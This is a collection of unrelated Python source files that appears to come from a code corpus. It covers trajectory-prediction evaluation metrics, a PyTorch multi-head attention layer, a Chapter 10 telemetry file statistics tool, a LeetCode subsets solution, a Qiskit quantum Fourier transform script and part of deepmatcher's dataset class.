    normalization is only approximate, and ``nb_pt`` is unbound if a scene
    file contains no samples — confirm this is acceptable.
    """
    nb_sample = 0
    spatial_conflicts_results = { "global": {"groundtruth":0,"pred":0}}
    for scene_file in scene_files:
        scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
        spatial_conflicts_results[scene] = {"groundtruth":0,"pred":0}
        scene_file = json.load(open(scene_file))
        #compute mask for spatial structure
        spatial_masks = scene_mask(scene,images,spatial_annotations,spatial_profiles)
        # get ratio for meter to pixel conversion
        meters_to_pixel = 1.0/pixel_meter_ratios[scene]
        # 1.0/ self.pixel_meter_ratios[self.scene]
        # print(scene)
        nb_sample_scene = 0
        for sample in scene_file:
            sample = scene_file[sample]
            # Trajectories are stored in meters; masks are indexed in pixels.
            label = np.array(sample["labels"][0]) * meters_to_pixel
            output = np.array(sample["outputs"][0]) * meters_to_pixel
            type_ = sample["types"][0]
            # Each agent type maps to a spatial profile (e.g. walkable area).
            spatial_profile_id = types_to_spatial[str(int(type_))]
            mask = spatial_masks[spatial_profile_id]
            nb_pt = len(output)
            spatial_pred = spatial_conflicts(mask,output)
            spatial_gt = spatial_conflicts(mask,label)
            spatial_conflicts_results["global"]["groundtruth"] += spatial_gt
            spatial_conflicts_results["global"]["pred"] += spatial_pred
            spatial_conflicts_results[scene]["groundtruth"] += spatial_gt
            spatial_conflicts_results[scene]["pred"] += spatial_pred
            nb_sample_scene += 1
        spatial_conflicts_results[scene]["groundtruth"] /= float(nb_pt*nb_sample_scene)
        spatial_conflicts_results[scene]["pred"] /= float(nb_pt*nb_sample_scene)
        nb_sample += nb_sample_scene
    spatial_conflicts_results["global"]["groundtruth"] /= float(nb_pt*nb_sample)
    spatial_conflicts_results["global"]["pred"] /= float(nb_pt*nb_sample)
    return spatial_conflicts_results
def spatial_conflicts(mask, trajectory_p):
    """Count trajectory points that land on a truthy cell of *mask*.

    Coordinates are truncated to integer pixel indices; points whose indices
    fall outside the mask bounds (out of frame) are skipped.
    """
    count = 0
    rows, cols = mask.shape[0], mask.shape[1]
    for point in trajectory_p:
        r, c = int(point[0]), int(point[1])
        if 0 <= r < rows and 0 <= c < cols and mask[r, c]:
            count += 1
    return count
def social_conflicts(scene_files, conflict_thresholds):
    """Mean proportion of agent pairs in conflict (closer than a threshold).

    Three variants are tracked per scene and globally, for every threshold:

    * ``joint``:       conflicts among the jointly predicted trajectories,
    * ``disjoint``:    groundtruth trajectories with only the main agent
                       (index 0) replaced by its prediction,
    * ``groundtruth``: conflicts among the groundtruth trajectories.

    Per-timestep conflict proportions from :func:`conflicts` are pooled into
    lists and averaged at the end.
    """
    social_results = {}
    social_results["global"] = {}
    for thresh in conflict_thresholds:
        social_results["global"]["joint_"+str(thresh)] = []
        social_results["global"]["disjoint_"+str(thresh)] = []
        social_results["global"]["groundtruth_"+str(thresh)] = []
    for scene_file in scene_files:
        scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
        social_results[scene] = {}
        for thresh in conflict_thresholds:
            social_results[scene]["joint_"+str(thresh)] = []
            social_results[scene]["disjoint_"+str(thresh)] = []
            social_results[scene]["groundtruth_"+str(thresh)] = []
        # print(scene)
        scene_file = json.load(open(scene_file))
        for sample in scene_file:
            sample = scene_file[sample]
            labels = sample["labels"]
            outputs = sample["outputs"]
            # social loss
            # "disjoint": groundtruth neighbors, predicted main agent.
            social_sample = copy.copy(labels)
            social_sample[0] = outputs[0]
            social_sample = np.array(social_sample)
            labels = np.array(labels)
            outputs = np.array(outputs)
            # social loss
            for thresh in conflict_thresholds:
                # print(thresh)
                frames_joint = conflicts(outputs,thresh)
                frames_disjoint = conflicts(social_sample,thresh)
                frames_gt = conflicts(labels,thresh)
                social_results["global"]["joint_"+str(thresh)] += frames_joint
                social_results["global"]["disjoint_"+str(thresh)] += frames_disjoint
                social_results["global"]["groundtruth_"+str(thresh)] += frames_gt
                social_results[scene]["joint_"+str(thresh)] += frames_joint
                social_results[scene]["disjoint_"+str(thresh)] += frames_disjoint
                social_results[scene]["groundtruth_"+str(thresh)] += frames_gt
        # Collapse the per-timestep lists into scene-level means.
        for thresh in conflict_thresholds:
            social_results[scene]["joint_"+str(thresh)] = np.mean(social_results[scene]["joint_"+str(thresh)])
            social_results[scene]["disjoint_"+str(thresh)] = np.mean(social_results[scene]["disjoint_"+str(thresh)])
            social_results[scene]["groundtruth_"+str(thresh)] = np.mean(social_results[scene]["groundtruth_"+str(thresh)])
    for thresh in conflict_thresholds:
        social_results["global"]["joint_"+str(thresh)] = np.mean(social_results["global"]["joint_"+str(thresh)])
        social_results["global"]["disjoint_"+str(thresh)] = np.mean(social_results["global"]["disjoint_"+str(thresh)])
        social_results["global"]["groundtruth_"+str(thresh)] = np.mean(social_results["global"]["groundtruth_"+str(thresh)])
    return social_results
# print(wasserstein_distance(distrib_pred,distrib_real))
def conflicts(trajectories, threshold=0.5):
    """Return, per timestep, the proportion of agent pairs closer than *threshold*.

    Axis 1 of *trajectories* is assumed to index timesteps; one conflict
    proportion (from :func:`conflicts_frame`) is returned per timestep.
    """
    return [
        conflicts_frame(np.array(trajectories[:, step]), threshold)
        for step in range(trajectories.shape[1])
    ]
def conflicts_frame(points, threshold):
    """Proportion of distinct agent pairs in *points* closer than *threshold*.

    Returns 0 when there are fewer than two points (no pairs to compare).
    """
    dists = distance_matrix(points, points)
    # Mark close pairs, dropping the self-distance diagonal.
    close = (dists < threshold).astype(int) - np.eye(len(points))
    # Keep each unordered pair exactly once (strict upper triangle).
    close = np.triu(close, 1)
    pair_count = np.triu(np.ones_like(close), 1).sum()
    if float(pair_count) > 0.:
        return close.sum() / float(pair_count)
    return 0
def get_distrib_conflicts(scene_files):
    """Wasserstein distance between pairwise-distance distributions.

    For each scene (and globally), pools the inter-agent distances of every
    timestep for three variants — "joint" (all-predicted), "disjoint"
    (groundtruth neighbors, predicted main agent) and groundtruth — and
    returns, per scene, the 1-Wasserstein distance of the joint and disjoint
    predicted distributions to the groundtruth distribution.
    """
    distrib_pred_disjoint = {"global":[]}
    distrib_pred = {"global":[]}
    distrib_real = {"global":[]}
    results = {}
    for scene_file in scene_files:
        scene = scene_file.split("/")[-1].split(".")[0].split("_")[0]
        # print(scene)
        distrib_pred[scene] = []
        distrib_pred_disjoint[scene] = []
        distrib_real[scene] = []
        scene_file = json.load(open(scene_file))
        for sample in scene_file:
            sample = scene_file[sample]
            labels = sample["labels"]
            outputs = sample["outputs"]
            # inputs = sample["inputs"]
            types = sample["types"]
            point_mask = sample["points_mask"]
            # "disjoint": groundtruth neighbors with predicted main agent.
            social_sample = copy.copy(labels)
            social_sample[0] = outputs[0]
            social_sample = np.array(social_sample)
            labels = np.array(labels)
            outputs = np.array(outputs)
            distances_pred_disjoint = get_distances_agents_interval(social_sample)
            distances_pred = get_distances_agents_interval(outputs)
            distances_real = get_distances_agents_interval(labels)
            distrib_pred_disjoint["global"] += distances_pred_disjoint
            distrib_pred["global"] += distances_pred
            distrib_real["global"] += distances_real
            distrib_pred_disjoint[scene] += distances_pred_disjoint
            distrib_pred[scene] += distances_pred
            distrib_real[scene] += distances_real
        results[scene] = {}
        results[scene]["disjoint"] = wasserstein_distance(distrib_pred_disjoint[scene],distrib_real[scene])
        results[scene]["joint"] = wasserstein_distance(distrib_pred[scene],distrib_real[scene])
    results["global"] = {}
    results["global"]["disjoint"] = wasserstein_distance(distrib_pred_disjoint["global"],distrib_real["global"])
    results["global"]["joint"] = wasserstein_distance(distrib_pred["global"],distrib_real["global"])
    return results
def get_distances_agents_frame(points):
    """Return the pairwise distances between distinct agents in *points*.

    Uses the strict upper triangle of the distance matrix so each unordered
    pair is counted once. NOTE(review): filtering on ``!= 0.`` also drops a
    genuine zero distance between coincident agents — kept for behavioral
    parity with the original.
    """
    upper = np.triu(distance_matrix(points, points), 1).flatten()
    return [value for value in upper if value != 0.]
def get_distances_agents_interval(trajectories):
    """Collect pairwise agent distances over every timestep of *trajectories*.

    Axis 1 of *trajectories* is assumed to index timesteps; the per-frame
    distance lists are concatenated in timestep order.
    """
    all_distances = []
    for step in range(trajectories.shape[1]):
        frame_points = np.array(trajectories[:, step])
        all_distances.extend(get_distances_agents_frame(frame_points))
    return all_distances
def speeds_distance(scene_files,types_dic,delta_t):
    """Wasserstein distance between real and predicted speed distributions.

    Pools per-step speeds of the main agent (index 0), grouped by agent type
    (via ``types_dic``) plus a "global" pool, and returns one distance per
    type. Speeds are computed by ``get_speeds`` — assumed to be defined
    elsewhere in this module.
    """
    speed_real_distribution = {}
    speed_predicted_distribution = {}
    speed_real_distribution["global"] = []
    speed_predicted_distribution["global"] = []
    for scene_file in scene_files:
        scene_file = json.load(open(scene_file))
        for sample in scene_file:
            sample = scene_file[sample]
            labels = sample["labels"]
            outputs = sample["outputs"]
            # inputs = sample["inputs"]
            types = sample["types"]
            point_mask = sample["points_mask"]
            type_str = types_dic[str(int(types[0]))]
            # Lazily create per-type pools the first time a type is seen.
            if type_str not in speed_predicted_distribution:
                speed_predicted_distribution[type_str] = []
            if type_str not in speed_real_distribution:
                speed_real_distribution[type_str] = []
            speeds_labels = get_speeds(labels[0],delta_t)
            speeds_outputs = get_speeds(outputs[0],delta_t)
            speed_real_distribution[type_str] += speeds_labels
            speed_predicted_distribution[type_str] += speeds_outputs
            speed_predicted_distribution["global"] += speeds_outputs
            speed_real_distribution["global"] += speeds_labels
    results = {}
    for type_ in speed_real_distribution:
        results[type_] = wasserstein_distance(speed_predicted_distribution[type_],speed_real_distribution[type_])
    return results
def accelerations_distance(scene_files,types_dic,delta_t):
    """Wasserstein distance between real and predicted acceleration distributions.

    Same pooling scheme as :func:`speeds_distance` (per agent type plus a
    "global" pool), but over per-step accelerations derived from speeds.
    ``get_speeds`` and ``get_accelerations`` are assumed to be defined
    elsewhere in this module.
    """
    acceleration_real_distribution = {}
    acceleration_predicted_distribution = {}
    acceleration_real_distribution["global"] = []
    acceleration_predicted_distribution["global"] = []
    for scene_file in scene_files:
        scene_file = json.load(open(scene_file))
        for sample in scene_file:
            sample = scene_file[sample]
            labels = sample["labels"]
            outputs = sample["outputs"]
            # inputs = sample["inputs"]
            types = sample["types"]
            point_mask = sample["points_mask"]
            type_str = types_dic[str(int(types[0]))]
            # Lazily create per-type pools the first time a type is seen.
            if type_str not in acceleration_predicted_distribution:
                acceleration_predicted_distribution[type_str] = []
            if type_str not in acceleration_real_distribution:
                acceleration_real_distribution[type_str] = []
            speeds_labels = get_speeds(labels[0],delta_t)
            speeds_outputs = get_speeds(outputs[0],delta_t)
            accelerations_labels = get_accelerations(speeds_labels,delta_t)
            accelerations_outputs = get_accelerations(speeds_outputs,delta_t)
            acceleration_real_distribution[type_str] += accelerations_labels
            acceleration_predicted_distribution[type_str] += accelerations_outputs
            acceleration_predicted_distribution["global"] += accelerations_outputs
            acceleration_real_distribution["global"] += accelerations_labels
    results = {}
    for type_ in acceleration_real_distribution:
        results[type_] = wasserstein_distance(acceleration_predicted_distribution[type_],acceleration_real_distribution[type_])
    return results
3391832 | <filename>ninjadog/utils.py
from functools import partial
from json import dumps

# JSON serializer that skips unserializable dict keys, renders objects json
# cannot encode as empty strings, and keeps non-ASCII characters as-is.
jsonify = partial(
    dumps,
    skipkeys=True,
    ensure_ascii=False,
    default=lambda _unused: '',
)
| StarcoderdataPython |
670 | <reponame>StateOfTheArt-quant/transformerquant
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import torch.nn as nn
from .single import attention
class MultiHeadedAttention(nn.Module):
    """Multi-head attention over ``nhead`` heads of size ``d_model // nhead``.

    Query, key and value are each linearly projected, split into heads,
    passed through :func:`attention`, then recombined and projected once more.
    """
    def __init__(self, d_model, nhead, dropout=0.1):
        super().__init__()
        assert d_model % nhead == 0
        # We assume d_v always equals d_k.
        self.d_k = d_model // nhead
        self.nhead = nhead
        # Three projections: one each for query, key and value.
        self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
        self.output_linear = nn.Linear(d_model, d_model)
        self.dropout = nn.Dropout(p=dropout)
    def _split_heads(self, projection, tensor, batch_size):
        # Project and reshape to (batch, nhead, seq, d_k).
        return projection(tensor).view(batch_size, -1, self.nhead, self.d_k).transpose(1, 2)
    def forward(self, query, key, value, mask=None):
        if mask is not None:
            # Broadcast the same mask across every attention head.
            mask = mask.unsqueeze(1)
        batch_size = query.size(0)
        q_proj, k_proj, v_proj = self.linear_layers
        heads_q = self._split_heads(q_proj, query, batch_size)
        heads_k = self._split_heads(k_proj, key, batch_size)
        heads_v = self._split_heads(v_proj, value, batch_size)
        # Apply attention on all the projected vectors in batch.
        attended, attn = attention(heads_q, heads_k, heads_v, mask=mask, dropout=self.dropout)
        # "Concat" the heads back together and apply the final linear layer.
        merged = attended.transpose(1, 2).contiguous().view(batch_size, -1, self.nhead * self.d_k)
        return self.output_linear(merged)
1743268 | <reponame>atac-bham/c10-tools
from contextlib import suppress
from urllib.parse import urlparse
import os
from termcolor import colored
import click
import s3fs
from c10_tools.common import C10, FileProgress, fmt_number, fmt_size, \
fmt_table, walk_packets
# Human-readable names for channel data types, indexed by data_type // 8
# (each type family spans 8 format subtypes; see Stat.file_summary).
TYPES = (
    'Computer Generated',
    'PCM',
    'Time',
    'Mil-STD-1553',
    'Analog',
    'Discrete',
    'Message',
    'ARINC 429',
    'Video',
    'Image',
    'UART',
    'IEEE-1394',
    'Parallel',
    'Ethernet',
    'TSPI/CTS Data',
    'Controller Area Network Bus',
)
class Stat:
    """Scan a Chapter 10 file and report per-channel packet counts and sizes.

    ``parse`` drives the two phases: ``scan_file`` walks packet headers and
    accumulates per-channel stats; ``file_summary`` prints a channel table
    and an overall summary.
    """
    def __init__(self, filename, channel, exclude, type, verbose, quiet):
        self.filename = filename
        # channel/exclude/type are comma-separated filter strings passed
        # through to walk_packets.
        self.channel = channel
        self.exclude = exclude
        self.type = type
        self.verbose = verbose
        self.quiet = quiet
        # channels: (channel_id, data_type) -> per-channel stats dict.
        # start_time: first time packet (data_type 0x11) seen, else 0.
        self.channels, self.start_time = {}, 0
    def parse(self):
        # Any scan failure (already reported in scan_file) aborts the summary.
        try:
            self.scan_file()
        except:
            return
        self.file_summary()
    def scan_file(self):
        """Skim the headers of a file and count packets and data size per channel.
        """
        # Get file object and size
        # S3 Format: s3://user:pass@host:port/bucket/path.c10
        if self.filename.startswith('s3://'):
            path = urlparse(self.filename)
            endpoint = f'http://{path.hostname}:{path.port}'
            fs = s3fs.S3FileSystem(key=path.username,
                                   secret=path.password,
                                   client_kwargs={
                                       'endpoint_url': endpoint})
            f = fs.open(path.path[1:])
            size = fs.du(path.path[1:])
        else:
            f = open(self.filename, 'rb')
            size = os.stat(self.filename).st_size
        # Walk through packets and track counts.
        with FileProgress(total=size, disable=self.quiet) as progress, suppress(KeyboardInterrupt):
            try:
                args = {
                    '--channel': self.channel,
                    '--type': self.type,
                    '--exclude': self.exclude
                }
                for packet in walk_packets(C10(f), args):
                    # Remember the first time packet for the summary.
                    if not self.start_time and packet.data_type == 0x11:
                        self.start_time = packet
                    key = (packet.channel_id, packet.data_type)
                    if key not in self.channels:
                        self.channels[key] = {'packets': 1,
                                              'size': packet.packet_length,
                                              'type': packet.data_type,
                                              'id': packet.channel_id,
                                              '1553_errors': [0, 0, 0],
                                              '1553_commands': set(),
                                              'events': {}}
                    else:
                        self.channels[key]['packets'] += 1
                        self.channels[key]['size'] += packet.packet_length
                    if self.verbose:
                        # Track 1553 error counts and command words
                        if packet.data_type == 0x19:
                            for msg in packet:
                                self.channels[key]['1553_commands'].add(
                                    f'{msg.data[0]:0x}'.zfill(2) + f'{msg.data[1]:0x}'.zfill(2))
                                for i, err in enumerate(('le', 'se', 'we')):
                                    err = getattr(msg, err)
                                    self.channels[key]['1553_errors'][i] += err
                        # Record events
                        elif packet.data_type == 0x2:
                            event_list = self.channels[key]['events']
                            for event in packet:
                                if event.number not in event_list:
                                    event_list[event.number] = 1
                                else:
                                    event_list[event.number] += 1
                    progress.update(packet.packet_length)
            except Exception as err:
                print(f'Failed to read file {self.filename} at offset \
{progress.n} with {err.__class__.__name__}: {err}')
                raise
            finally:
                f.close()
        # If no packets were read at all, there is no end time.
        try:
            self.end_time = packet.get_time()
        except UnboundLocalError:
            self.end_time = None
    def file_summary(self):
        """Summarize channels and the file as a whole."""
        # Print channel details.
        table = [('Channel ID', 'Data Type', 'Packets', 'Size')]
        packets, size = 0, 0
        for key, channel in sorted(self.channels.items()):
            # data_type encodes family (//8) and format subtype (remainder).
            datatype = channel['type'] // 8
            subtype = channel['type'] - (datatype * 8)
            table.append((
                f'Channel {channel["id"]:2}',
                f'0x{channel["type"]:02x} - {TYPES[datatype]} (format \
{subtype})',
                fmt_number(channel['packets']),
                fmt_size(channel['size'])))
            if self.verbose:
                if channel['type'] == 0x19:
                    table.append((f'    Command words ({len(channel["1553_commands"])}):',))
                    for command in sorted(channel['1553_commands']):
                        table.append((f'      {command}',))
                    total = sum(channel['1553_errors'])
                    if total:
                        error_str = '    Err: ' + f'{total:>11,}'
                        for i, err in enumerate(('Length', 'Sync', 'Word')):
                            count = channel['1553_errors'][i]
                            error_str += f' {err}: {count:>9,}'.ljust(14)
                        table.append((colored(error_str + '  ', 'red'),))
                elif channel['type'] == 0x2:
                    table.append(('    Events:',))
                    for event, count in sorted(channel['events'].items()):
                        table.append((f'{event:>8}: {count:>10}',))
            packets += channel['packets']
            size += channel['size']
        print(fmt_table(table))
        # Print file summary.
        duration = 0
        start_time, end_time = 0, 0
        if self.start_time:
            duration = str(self.end_time - self.start_time.time)
            fmt = '%j %H:%M:%S'
            if self.start_time.date_format:
                fmt = '%j-%Y %H:%M:%S'
            start_time = self.start_time.time.strftime(fmt)
            end_time = self.end_time.strftime(fmt)
        print(f'''Summary for {self.filename}:
     Channels: {len(self.channels):>17}     Start time:{start_time:>25}
      Packets: {fmt_number(packets):>18}       End time:{end_time:>27}
         Size: {fmt_size(size):>21}       Duration:{duration:>27}\n''')
@click.command()
@click.argument('file', nargs=-1)
@click.option('-c', '--channel', type=str, help='Specify channels (comma-separated) to include')
@click.option('-e', '--exclude', type=str, help='Specify channels (comma-separated) to exclude')
@click.option('-t', '--type', type=str, help='Specify datatypes (comma-separated) to include')
@click.pass_context
def stat(ctx, file, channel, exclude, type):
    """Inspect one or more Chapter 10 files and get channel info."""
    ctx.ensure_object(dict)
    # Each file is scanned and summarized independently; verbose/quiet come
    # from the parent command's context object.
    for filename in file:
        stats = Stat(filename, channel, exclude, type,
                     verbose=ctx.obj.get('verbose'), quiet=ctx.obj.get('quiet'))
        stats.parse()
1770285 | <gh_stars>0
#
# @lc app=leetcode id=90 lang=python3
#
# [90] Subsets II
#
# @lc code=start
class Solution:
    """LeetCode 90: generate all unique subsets of a list that may contain
    duplicates. Duplicates are grouped into (value, count) pairs so each
    value contributes 0..count copies to a subset."""
    def gen_recur(self, leading_sets: List[List[int]], ns: List[List[int]]) \
            -> List[List[int]]:
        """Recursively extend each subset in *leading_sets* with 0..c copies
        of each remaining (value, count) pair in *ns*."""
        if not ns:
            return leading_sets
        all_sets = leading_sets[:]
        n, c = ns[0]
        for i in range(1, c + 1):
            all_sets += [s + [n] * i for s in leading_sets]
        # BUG FIX: was ``self.gen(...)``, a method that does not exist and
        # raised AttributeError on any call with a non-empty ``ns``.
        return self.gen_recur(all_sets, ns[1:])
    def gen_iter(self, ns: List[List[int]]) -> List[List[int]]:
        """Iterative equivalent of gen_recur, starting from the empty set."""
        leading_sets = [[]]
        if not ns:
            return leading_sets
        for i in range(len(ns)):
            new_sets = leading_sets[:]
            n, c = ns[i]
            for rep in range(1, c + 1):
                new_sets += [s + [n] * rep for s in leading_sets]
            leading_sets = new_sets
        return leading_sets
    def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:
        """Return all unique subsets of *nums* (order of subsets unspecified)."""
        nums.sort()
        # Run-length encode the sorted input into [value, count] pairs.
        ns = []
        for n in nums:
            if not ns or n != ns[-1][0]:
                ns.append([n, 1])
            else:  # n == ns[-1][0]
                ns[-1][1] += 1
        return self.gen_iter(ns)
# @lc code=end
| StarcoderdataPython |
35681 | <gh_stars>0
"""Allow users to access the function directly."""
from egcd.egcd import egcd
| StarcoderdataPython |
1776493 | import numpy as np
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute
# Two simulator backends: a density-matrix simulator and the standard qasm
# simulator, both run on the same circuit for comparison.
backend1 = BasicAer.get_backend('dm_simulator')
backend2 = BasicAer.get_backend('qasm_simulator')
options = {}
def generator(k):
    """Return the controlled-phase rotation angle 2*pi / 2**k used by the QFT."""
    return 2 * np.pi / 2 ** k
num_of_qubits = 5
q = QuantumRegister(num_of_qubits, 'q')
circ = QuantumCircuit(q)
# Manually unrolled 5-qubit QFT: Hadamard on each qubit followed by the
# controlled phase rotations toward the earlier qubits.
circ.h(q[0])
circ.cu1(generator(2),q[1],q[0])
circ.h(q[1])
circ.cu1(generator(3), q[2], q[0])
circ.cu1(generator(2), q[2], q[1])
circ.h(q[2])
circ.cu1(generator(4), q[3], q[0])
circ.cu1(generator(3), q[3], q[1])
circ.cu1(generator(2), q[3], q[2])
circ.h(q[3])
circ.cu1(generator(5), q[4], q[0])
circ.cu1(generator(4), q[4], q[1])
circ.cu1(generator(3), q[4], q[2])
circ.cu1(generator(2), q[4], q[3])
circ.h(q[4])
# NOTE(review): the loop below re-applies the same H/cu1 pattern that was
# just built manually above, so the circuit contains the gate sequence
# twice. This looks like a leftover of refactoring the manual version into
# the loop — confirm whether both are intended.
for wire in range (num_of_qubits-1):
    circ.h(q[wire])
    for rotation in range(wire+1):
        circ.cu1(generator(wire+2-rotation), q[wire+1], q[rotation])
circ.h(q[num_of_qubits-1])
#circ.draw(output='mpl', line_length=120, scale=0.5)
# Execute the same circuit on both simulators and print the results.
circuits = [circ]
job = execute(circuits, backend1, **options)
result = job.result()
print(result)
job = execute(circuits, backend2, **options)
result = job.result()
print(result)
1674946 | import copy
import logging
import os
from collections import Counter, defaultdict
from timeit import default_timer as timer
from typing import Any, Dict, List, Tuple
import pandas as pd
import pyprind
import six
import torch
import torch.nn as nn
from sklearn.decomposition import TruncatedSVD
from torchtext import data
from torchtext.data.example import Example
from torchtext.utils import unicode_csv_reader
from deepmatcher.data.field import MatchingField
from deepmatcher.data.iterator import MatchingIterator
from deepmatcher.models.modules import NoMeta, Pool
logger = logging.getLogger(__name__)
def split(
    table: pd.DataFrame,
    path: str,
    train_prefix: str,
    validation_prefix: str,
    test_prefix: str,
    split_ratio: Tuple[float, float, float] = (0.6, 0.2, 0.2),
    stratified: bool = False,
    strata_field: str = "label",
):
    """Split a pandas dataframe or CSV file into train / validation / test data sets.

    Args:
        table (pandas.Dataframe or string): The pandas dataframe or CSV file to split.
        path (string): The directory to save the train, validation and test CSV files to.
        train_prefix: Filename (joined to `path`) for the training set CSV.
        validation_prefix: Filename (joined to `path`) for the validation set CSV.
        test_prefix: Filename (joined to `path`) for the test set CSV.
        split_ratio (List of floats): a list of 3 numbers denoting the relative sizes of
            train, test and valid splits respectively. Default is [0.6, 0.2, 0.2].
        stratified (bool): whether the sampling should be stratified.
            Default is False.
        strata_field (str): name of the examples Field stratified over.
            Default is 'label' for the conventional label field
    """
    assert len(split_ratio) == 3
    split_ratio = list(split_ratio)
    if not isinstance(table, pd.DataFrame):
        table = pd.read_csv(table)
    if table.index.name is not None:
        # Keep a named index as a regular column so it survives the round trip.
        table = table.reset_index()
    examples = list(table.itertuples(index=False))
    # Fields are None so torchtext keeps the raw values without processing.
    fields = [(col, None) for col in list(table)]
    dataset = data.Dataset(examples, fields)
    train, valid, test = dataset.split(split_ratio, stratified, strata_field)
    tables = (
        pd.DataFrame(train.examples),
        pd.DataFrame(valid.examples),
        pd.DataFrame(test.examples),
    )
    prefixes = (train_prefix, validation_prefix, test_prefix)
    for i in range(len(tables)):
        # Restore the original column names before writing each split out.
        tables[i].columns = table.columns
        tables[i].to_csv(os.path.join(path, prefixes[i]), index=False)
class MatchingDataset(data.Dataset):
"""Represents dataset with associated metadata.
Holds all information about one split of a dataset (e.g. training set).
Attributes:
fields (dict): A mapping from attribute names (e.g. "left_address") to
corresponding :class:`~data.MatchingField` objects that specify how to process
the field.
examples (list): A list containing all the examples (labeled tuple pairs) in this
dataset.
metadata (dict): Metadata about the dataset (e.g. word probabilities).
See :meth:`~data.MatchingDataset.compute_metadata` for details.
corresponding_field (dict): A mapping from left table attribute names
(e.g. "left_address") to corresponding right table attribute names
(e.g. "right_address") and vice versa.
text_fields (dict): A mapping from canonical attribute names (e.g. "address") to
tuples of the corresponding left and right attribute names
(e.g. ("left_address", "right_address")).
all_left_fields (list): A list of all left table attribute names.
all_right_fields (list): A list of all right table attribute names.
canonical_text_fields (list): A list of all canonical attribute names.
label_field (str): Name of the column containing labels.
id_field (str): Name of the column containing tuple pair ids.
"""
    class CacheStaleException(Exception):
        """Raised when the dataset cache is stale and no fallback behavior is specified."""
        pass  # no additional behavior; the type itself is the signal
    def __init__(
        self,
        fields: List[Tuple[str, MatchingField]],
        column_naming: Dict[str, str],
        path: str,
        out_format: str = "csv",
        examples: List[Example] = None,
        metadata: Dict[str, Dict[str, Any]] = None,
        **kwargs
    ):
        """Creates a MatchingDataset.

        Creates a MatchingDataset by performing the following, if `examples` parameter is
        not specified:

        #. Read each example (tuple pair) in specified CSV file.
        #. Preprocess example. Involves lowercasing and tokenization (unless disabled).
        #. Compute metadata. See :meth:`~data.MatchingDataset.compute_metadata` for
           details.

        If `examples` is specified, initializes MatchingDataset from given `examples`
        and `metadata` arguments.

        Arguments:
            fields (list(tuple(str, MatchingField))): A list of tuples containing column
                name (e.g. "left_address") and corresponding :class:`~data.MatchingField`
                pairs, in the same order that the columns occur in the CSV file. Tuples of
                (name, None) represent columns that will be ignored.
            column_naming (dict): A `dict` containing the following keys:

                * ``id``: The name of the tuple pair ID column.
                * ``label``: The name of the tuple pair match label column.
                * ``left``: The prefix for attribute names belonging to the left table.
                * ``right``: The prefix for attribute names belonging to the right table.
            path (str): Path to the data file. Must be specified if `examples` is None.
            out_format (str): The format of the data file. One of "CSV" or "TSV".
            examples (list): A list containing all the examples (labeled tuple pairs) in
                this dataset. Must be specified if `path` is None.
            metadata (dict): Metadata about the dataset (e.g. word probabilities).
                See :meth:`~data.MatchingDataset.compute_metadata` for details.
            filter_pred (callable or None): Use only examples for which
                filter_pred(example) is True, or use all examples if None.
                Default is None. This is a keyword-only parameter.
        """
        if examples is None:
            # Pick the torchtext Example constructor matching the file format.
            make_example = {
                "json": Example.fromJSON,
                "dict": Example.fromdict,
                "tsv": Example.fromCSV,
                "csv": Example.fromCSV,
            }[out_format.lower()]
            # First pass: count lines so the progress bar knows the total.
            lines = 0
            with open(os.path.expanduser(path), encoding="utf8") as f:
                for line in f:
                    lines += 1
            with open(os.path.expanduser(path), encoding="utf8") as f:
                if out_format == "csv":
                    reader = unicode_csv_reader(f)
                elif out_format == "tsv":
                    reader = unicode_csv_reader(f, delimiter="\t")
                else:
                    reader = f
                # Skip the header row.
                next(reader)
                examples = [
                    make_example(line, fields)
                    for line in pyprind.prog_bar(
                        reader,
                        iterations=lines,
                        title='\nReading and processing data from "' + path + '"',
                    )
                ]
            super(MatchingDataset, self).__init__(examples, fields, **kwargs)
        else:
            # Pre-built examples: bypass the torchtext Dataset constructor.
            self.fields = dict(fields)
            self.examples = examples
            self.metadata = metadata
        self.path = path
        self.column_naming = column_naming
        self._set_attributes()
def _set_attributes(self):
"""Sets attributes by inferring mapping between left and right table attributes."""
self.corresponding_field = {}
self.text_fields = {}
self.all_left_fields = []
for name, field in six.iteritems(self.fields):
if name.startswith(self.column_naming["left"]) and field is not None:
self.all_left_fields.append(name)
self.all_right_fields = []
for name, field in six.iteritems(self.fields):
if name.startswith(self.column_naming["right"]) and field is not None:
self.all_right_fields.append(name)
self.canonical_text_fields = []
for left_name in self.all_left_fields:
canonical_name = left_name[len(self.column_naming["left"]) :]
right_name = self.column_naming["right"] + canonical_name
self.corresponding_field[left_name] = right_name
self.corresponding_field[right_name] = left_name
self.text_fields[canonical_name] = left_name, right_name
self.canonical_text_fields.append(canonical_name)
self.all_text_fields = self.all_left_fields + self.all_right_fields
self.label_field = self.column_naming["label"]
self.id_field = self.column_naming["id"]
    def compute_metadata(self, pca: bool = False):
        """Computes metadata about the dataset.

        Computes the following metadata about the dataset:

        * ``word_probs``: For each attribute in the dataset, a mapping from words to
          word (token) probabilities.
        * ``totals``: For each attribute in the dataset, a count of the total number of
          words present in all attribute examples.
        * ``pc``: For each attribute in the dataset, the first principal component of the
          sequence embeddings for all values of that attribute. The sequence embedding of
          an attribute value is computed by taking the weighted average of its word
          embeddings, where the weight is the soft inverse word probability. Refer
          `Arora et al. (2017) <https://openreview.net/pdf?id=SyK00v5xx>`__ for details.

        Arguments:
            pca (bool): Whether to compute the ``pc`` metadata.
        """
        self.metadata = {}

        # Create an iterator over the entire dataset.
        train_iter = MatchingIterator(
            self, self, train=False, batch_size=1024, device=-1, sort_in_buckets=False
        )
        counter: Dict[str, Counter] = defaultdict(Counter)

        # For each attribute, find the number of times each word id occurs in the dataset.
        # Note that word ids here also include ``UNK`` tokens, padding tokens, etc.
        for batch in pyprind.prog_bar(train_iter, title="\nBuilding vocabulary"):
            for name in self.all_text_fields:
                attr_input = getattr(batch, name)
                counter[name].update(attr_input.data.data.view(-1))

        word_probs = {}
        totals = {}

        for name in self.all_text_fields:
            attr_counter = counter[name]
            total = sum(attr_counter.values())
            totals[name] = total

            field_word_probs = {}
            for word, freq in attr_counter.items():
                field_word_probs[int(word)] = freq / total
            word_probs[name] = field_word_probs
        self.metadata["word_probs"] = word_probs
        self.metadata["totals"] = totals

        if not pca:
